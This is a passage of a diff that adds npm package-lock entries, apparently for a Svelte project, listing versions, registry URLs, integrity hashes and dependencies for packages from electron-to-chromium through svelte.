+ "node_modules/electron-to-chromium": { + "version": "1.4.590", + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.590.tgz", + "integrity": "sha512-hohItzsQcG7/FBsviCYMtQwUSWvVF7NVqPOnJCErWsAshsP/CR2LAXdmq276RbESNdhxiAq5/vRo1g2pxGXVww==", + "dev": true + }, + "node_modules/es6-promise": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/es6-promise/-/es6-promise-3.3.1.tgz", + "integrity": "sha512-SOp9Phqvqn7jtEUxPWdWfWoLmyt2VaJ6MpvP9Comy1MceMXqE6bxvaTu4iaxpYYPzhny28Lc+M87/c2cPK6lDg==", + "dev": true + }, + "node_modules/esbuild": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.18.20.tgz", + "integrity": "sha512-ceqxoedUrcayh7Y7ZX6NdbbDzGROiyVBgC4PriJThBKSVPWnnFHZAkfI1lJT8QFkOwH4qOS2SJkS4wvpGl8BpA==", + "hasInstallScript": true, + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=12" + }, + "optionalDependencies": { + "@esbuild/android-arm": "0.18.20", + "@esbuild/android-arm64": "0.18.20", + "@esbuild/android-x64": "0.18.20", + "@esbuild/darwin-arm64": "0.18.20", + "@esbuild/darwin-x64": "0.18.20", + "@esbuild/freebsd-arm64": "0.18.20", + "@esbuild/freebsd-x64": "0.18.20", + "@esbuild/linux-arm": "0.18.20", + "@esbuild/linux-arm64": "0.18.20", + "@esbuild/linux-ia32": "0.18.20", + "@esbuild/linux-loong64": "0.18.20", + "@esbuild/linux-mips64el": "0.18.20", + "@esbuild/linux-ppc64": "0.18.20", + "@esbuild/linux-riscv64": "0.18.20", + "@esbuild/linux-s390x": "0.18.20", + "@esbuild/linux-x64": "0.18.20", + "@esbuild/netbsd-x64": "0.18.20", + "@esbuild/openbsd-x64": "0.18.20", + "@esbuild/sunos-x64": "0.18.20", + "@esbuild/win32-arm64": "0.18.20", + "@esbuild/win32-ia32": "0.18.20", + "@esbuild/win32-x64": "0.18.20" + } + }, + "node_modules/escalade": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", + "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/esm-env": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/esm-env/-/esm-env-1.0.0.tgz", + "integrity": "sha512-Cf6VksWPsTuW01vU9Mk/3vRue91Zevka5SjyNf3nEpokFRuqt/KjUQoGAwq9qMmhpLTHmXzSIrFRw8zxWzmFBA==" + }, + "node_modules/estree-walker": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-3.0.3.tgz", + "integrity": "sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==", + "dependencies": { + "@types/estree": "^1.0.0" + } + }, + "node_modules/fast-glob": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.2.tgz", + "integrity": "sha512-oX2ruAFQwf/Orj8m737Y5adxDQO0LAB7/S5MnxCdTNDd4p6BsyIVsv9JQsATbTSq8KHRpLwIHbVlUNatxd+1Ow==", + "dev": true, + "dependencies": { + "@nodelib/fs.stat": "^2.0.2", + "@nodelib/fs.walk": "^1.2.3", + "glob-parent": "^5.1.2", + "merge2": "^1.3.0", + "micromatch": "^4.0.4" + }, + "engines": { + "node": ">=8.6.0" + } + }, + "node_modules/fastq": { + "version": "1.15.0", + "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.15.0.tgz", + "integrity": "sha512-wBrocU2LCXXa+lWBt8RoIRD89Fi8OdABODa/kEnyeyjS5aZO5/GNvI5sEINADqP/h8M29UHTHUb53sUu5Ihqdw==", + "dev": true, + "dependencies": { + "reusify": "^1.0.4" + } + }, + "node_modules/fill-range": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", + "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", + "dev": true, + "dependencies": { + "to-regex-range": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/fraction.js": { + "version": "4.3.7", + "resolved": "https://registry.npmjs.org/fraction.js/-/fraction.js-4.3.7.tgz", + "integrity": "sha512-ZsDfxO51wGAXREY55a7la9LScWpwv9RxIrYABrlvOFBlH/ShPnrtsXeuUIfXKKOVicNxQ+o8JTbJvjS4M89yew==", + "dev": true, + "engines": { + "node": "*" + }, + "funding": { + "type": "patreon", + "url": "https://github.com/sponsors/rawify" + } + }, + "node_modules/fs.realpath": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "dev": true + }, + "node_modules/fsevents": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", + "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", + "hasInstallScript": true, + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^8.16.0 || ^10.6.0 || >=11.0.0" + } + }, + "node_modules/glob": { + "version": "7.2.3", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", + "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "dev": true, + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.1.1", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + }, + "engines": { + "node": "*" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/glob-parent": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", + "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/globalyzer": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/globalyzer/-/globalyzer-0.1.0.tgz", + "integrity": "sha512-40oNTM9UfG6aBmuKxk/giHn5nQ8RVz/SS4Ir6zgzOv9/qC3kKZ9v4etGTcJbEl/NyVQH7FGU7d+X1egr57Md2Q==" + }, + "node_modules/globrex": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/globrex/-/globrex-0.1.2.tgz", + "integrity": "sha512-uHJgbwAMwNFf5mLst7IWLNg14x1CkeqglJb/K3doi4dw6q2IvAAmM/Y81kevy83wP+Sst+nutFTYOGg3d1lsxg==" + }, + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true + }, + "node_modules/import-fresh": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", + "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", + "dev": true, + "dependencies": { + "parent-module": "^1.0.0", + "resolve-from": "^4.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/import-meta-resolve": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/import-meta-resolve/-/import-meta-resolve-4.0.0.tgz", + "integrity": "sha512-okYUR7ZQPH+efeuMJGlq4f8ubUgO50kByRPyt/Cy1Io4PSRsPjxME+YlVaCOx+NIToW7hCsZNFJyTPFFKepRSA==", + "dev": true, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/inflight": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", + "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "dev": true, + "dependencies": { + "once": "^1.3.0", + "wrappy": "1" + } + }, + "node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dev": true + }, + "node_modules/is-binary-path": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz", + "integrity": "sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==", + "dev": true, + "dependencies": { + "binary-extensions": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/is-extglob": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", + "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-glob": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", + "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", + "dev": true, + "dependencies": { + "is-extglob": "^2.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true, + "engines": { + "node": ">=0.12.0" + } + }, + "node_modules/is-reference": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/is-reference/-/is-reference-3.0.2.tgz", + "integrity": "sha512-v3rht/LgVcsdZa3O2Nqs+NMowLOxeOm7Ay9+/ARQ2F+qEoANRcqrjAZKGN0v8ymUetZGgkp26LTnGT7H0Qo9Pg==", + "dependencies": { + "@types/estree": "*" + } + }, + "node_modules/kleur": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/kleur/-/kleur-4.1.5.tgz", + "integrity": "sha512-o+NO+8WrRiQEE4/7nwRJhN1HWpVmJm511pBHUxPLtp0BUISzlBplORYSmTclCnJvQq2tKu/sgl3xVpkc7ZWuQQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/leaflet": { + "version": "1.9.4", + "resolved": "https://registry.npmjs.org/leaflet/-/leaflet-1.9.4.tgz", + "integrity": "sha512-nxS1ynzJOmOlHp+iL3FyWqK89GtNL8U8rvlMOsQdTTssxZwCXh8N2NB3GDQOL+YR3XnWyZAxwQixURb+FA74PA==" + }, + "node_modules/locate-character": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/locate-character/-/locate-character-3.0.0.tgz", + "integrity": "sha512-SW13ws7BjaeJ6p7Q6CO2nchbYEc3X3J6WrmTTDto7yMPqVSZTUyY5Tjbid+Ab8gLnATtygYtiDIJGQRRn2ZOiA==" + }, + "node_modules/magic-string": { + "version": "0.30.5", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.5.tgz", + "integrity": "sha512-7xlpfBaQaP/T6Vh8MO/EqXSW5En6INHEvEXQiuff7Gku0PWjU3uf6w/j9o7O+SpB5fOAkrI5HeoNgwjEO0pFsA==", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.4.15" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/mdn-data": { + "version": "2.0.30", + "resolved": "https://registry.npmjs.org/mdn-data/-/mdn-data-2.0.30.tgz", + "integrity": "sha512-GaqWWShW4kv/G9IEucWScBx9G1/vsFZZJUO+tD26M8J8z3Kw5RDQjaoZe03YAClgeS/SWPOcb4nkFBTEi5DUEA==" + }, + "node_modules/merge2": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", + "integrity": "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==", + "dev": true, + "engines": { + "node": ">= 8" + } + }, + "node_modules/micromatch": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", + "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", + "dev": true, + "dependencies": { + "braces": "^3.0.2", + "picomatch": "^2.3.1" + }, + "engines": { + "node": ">=8.6" + } + }, + "node_modules/min-indent": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/min-indent/-/min-indent-1.0.1.tgz", + "integrity": "sha512-I9jwMn07Sy/IwOj3zVkVik2JTvgpaykDZEigL6Rx6N9LbMywwUSMtxET+7lVoDLLd3O3IXwJwvuuns8UB/HeAg==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/minimatch": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", + "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "dev": true, + "dependencies": { + "brace-expansion": "^1.1.7" + }, + "engines": { + "node": "*" + } + }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/mkdirp": { + "version": "0.5.6", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", + "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", + "dev": true, + "dependencies": { + "minimist": "^1.2.6" + }, + "bin": { + "mkdirp": "bin/cmd.js" + } + }, + "node_modules/mri": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/mri/-/mri-1.2.0.tgz", + "integrity": "sha512-tzzskb3bG8LvYGFF/mDTpq3jpI6Q9wc3LEmBaghu+DdCssd1FakN7Bc0hVNmEyGq1bq3RgfkCb3cmQLpNPOroA==", + "engines": { + "node": ">=4" + } + }, + "node_modules/mrmime": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/mrmime/-/mrmime-1.0.1.tgz", + "integrity": "sha512-hzzEagAgDyoU1Q6yg5uI+AorQgdvMCur3FcKf7NhMKWsaYg+RnbTyHRa/9IlLF9rf455MOCtcqqrQQ83pPP7Uw==", + "engines": { + "node": ">=10" + } + }, + "node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/nanoid": { + "version": "3.3.7", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.7.tgz", + "integrity": "sha512-eSRppjcPIatRIMC1U6UngP8XFcz8MQWGQdt1MTBQ7NaAmvXDfvNxbvWV3x2y6CdEUciCSsDHDQZbhYaB8QEo2g==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "bin": { + "nanoid": "bin/nanoid.cjs" + }, + "engines": { + "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1" + } + }, + "node_modules/node-releases": { + "version": "2.0.13", + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", + "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", + "dev": true + }, + "node_modules/normalize-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", + "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/normalize-range": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/normalize-range/-/normalize-range-0.1.2.tgz", + "integrity": "sha512-bdok/XvKII3nUpklnV6P2hxtMNrCboOjAcyBuQnWEhO665FwrSNRxU+AqpsyvO6LgGYPspN+lu5CLtw4jPRKNA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dev": true, + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/parent-module": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", + "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", + "dev": true, + "dependencies": { + "callsites": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/path-is-absolute": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/periscopic": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/periscopic/-/periscopic-3.1.0.tgz", + "integrity": "sha512-vKiQ8RRtkl9P+r/+oefh25C3fhybptkHKCZSPlcXiJux2tJF55GnEj3BVn4A5gKfq9NWWXXrxkHBwVPUfH0opw==", + "dependencies": { + "@types/estree": "^1.0.0", + "estree-walker": "^3.0.0", + "is-reference": "^3.0.0" + } + }, + "node_modules/picocolors": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", + "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==" + }, + "node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "dev": true, + "engines": { + "node": ">=8.6" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/postcss": { + "version": "8.4.31", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz", + "integrity": "sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "nanoid": "^3.3.6", + "picocolors": "^1.0.0", + "source-map-js": "^1.0.2" + }, + "engines": { + "node": "^10 || ^12 || >=14" + } + }, + "node_modules/postcss-load-config": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-4.0.2.tgz", + "integrity": "sha512-bSVhyJGL00wMVoPUzAVAnbEoWyqRxkjv64tUl427SKnPrENtq6hJwUojroMz2VB+Q1edmi4IfrAPpami5VVgMQ==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "optional": true, + "peer": true, + "dependencies": { + "lilconfig": "^3.0.0", + "yaml": "^2.3.4" + }, + "engines": { + "node": ">= 14" + }, + "peerDependencies": { + "postcss": ">=8.0.9", + "ts-node": ">=9.0.0" + }, + "peerDependenciesMeta": { + "postcss": { + "optional": true + }, + "ts-node": { + "optional": true + } + } + }, + "node_modules/postcss-load-config/node_modules/lilconfig": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/lilconfig/-/lilconfig-3.0.0.tgz", + "integrity": "sha512-K2U4W2Ff5ibV7j7ydLr+zLAkIg5JJ4lPn1Ltsdt+Tz/IjQ8buJ55pZAxoP34lqIiwtF9iAvtLv3JGv7CAyAg+g==", + "dev": true, + "optional": true, + "peer": true, + "engines": { + "node": ">=14" + } + }, + "node_modules/postcss-value-parser": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz", + "integrity": "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==", + "dev": true + }, + "node_modules/queue-microtask": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", + "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/readdirp": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", + "integrity": "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==", + "dev": true, + "dependencies": { + "picomatch": "^2.2.1" + }, + "engines": { + "node": ">=8.10.0" + } + }, + "node_modules/resolve-from": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", + "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/reusify": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", + "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==", + "dev": true, + "engines": { + "iojs": ">=1.0.0", + "node": ">=0.10.0" + } + }, + "node_modules/rimraf": { + "version": "2.7.1", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", + "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", + "dev": true, + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/rollup": { + "version": "3.29.4", + "resolved": "https://registry.npmjs.org/rollup/-/rollup-3.29.4.tgz", + "integrity": "sha512-oWzmBZwvYrU0iJHtDmhsm662rC15FRXmcjCk1xD771dFDx5jJ02ufAQQTn0etB2emNk4J9EZg/yWKpsn9BWGRw==", + "bin": { + "rollup": "dist/bin/rollup" + }, + "engines": { + "node": ">=14.18.0", + "npm": ">=8.0.0" + }, + "optionalDependencies": { + "fsevents": "~2.3.2" + } + }, + "node_modules/run-parallel": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", + "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "queue-microtask": "^1.2.2" + } + }, + "node_modules/sade": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/sade/-/sade-1.8.1.tgz", + "integrity": "sha512-xal3CZX1Xlo/k4ApwCFrHVACi9fBqJ7V+mwhBsuf/1IOKbBy098Fex+Wa/5QMubw09pSZ/u8EY8PWgevJsXp1A==", + "dependencies": { + "mri": "^1.1.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/sander": { + "version": "0.5.1", + "resolved": "https://registry.npmjs.org/sander/-/sander-0.5.1.tgz", + "integrity": "sha512-3lVqBir7WuKDHGrKRDn/1Ye3kwpXaDOMsiRP1wd6wpZW56gJhsbp5RqQpA6JG/P+pkXizygnr1dKR8vzWaVsfA==", + "dev": true, + "dependencies": { + "es6-promise": "^3.1.2", + "graceful-fs": "^4.1.3", + "mkdirp": "^0.5.1", + "rimraf": "^2.5.2" + } + }, + "node_modules/set-cookie-parser": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/set-cookie-parser/-/set-cookie-parser-2.6.0.tgz", + "integrity": "sha512-RVnVQxTXuerk653XfuliOxBP81Sf0+qfQE73LIYKcyMYHG94AuH0kgrQpRDuTZnSmjpysHmzxJXKNfa6PjFhyQ==" + }, + "node_modules/sirv": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/sirv/-/sirv-2.0.3.tgz", + "integrity": "sha512-O9jm9BsID1P+0HOi81VpXPoDxYP374pkOLzACAoyUQ/3OUVndNpsz6wMnY2z+yOxzbllCKZrM+9QrWsv4THnyA==", + "dependencies": { + "@polka/url": "^1.0.0-next.20", + "mrmime": "^1.0.0", + "totalist": "^3.0.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/sorcery": { + "version": "0.11.0", + "resolved": "https://registry.npmjs.org/sorcery/-/sorcery-0.11.0.tgz", + "integrity": "sha512-J69LQ22xrQB1cIFJhPfgtLuI6BpWRiWu1Y3vSsIwK/eAScqJxd/+CJlUuHQRdX2C9NGFamq+KqNywGgaThwfHw==", + "dev": true, + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.4.14", + "buffer-crc32": "^0.2.5", + "minimist": "^1.2.0", + "sander": "^0.5.0" + }, + "bin": { + "sorcery": "bin/sorcery" + } + }, + "node_modules/source-map-js": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.0.2.tgz", + "integrity": "sha512-R0XvVJ9WusLiqTCEiGCmICCMplcCkIwwR11mOSD9CR5u+IXYdiseeEuXCVAjS54zqwkLcPNnmU4OeJ6tUrWhDw==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/strip-indent": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-indent/-/strip-indent-3.0.0.tgz", + "integrity": "sha512-laJTa3Jb+VQpaC6DseHhF7dXVqHTfJPCRDaEbid/drOhgitgYku/letMUqOXFoWV0zIIUbjpdH2t+tYj4bQMRQ==", + "dev": true, + "dependencies": { + "min-indent": "^1.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/svelte": { + "version": "4.2.7", + "resolved": "https://registry.npmjs.org/svelte/-/svelte-4.2.7.tgz", + "integrity": "sha512-UExR1KS7raTdycsUrKLtStayu4hpdV3VZQgM0akX8XbXgLBlosdE/Sf3crOgyh9xIjqSYB3UEBuUlIQKRQX2hg==", + "dependencies": { + 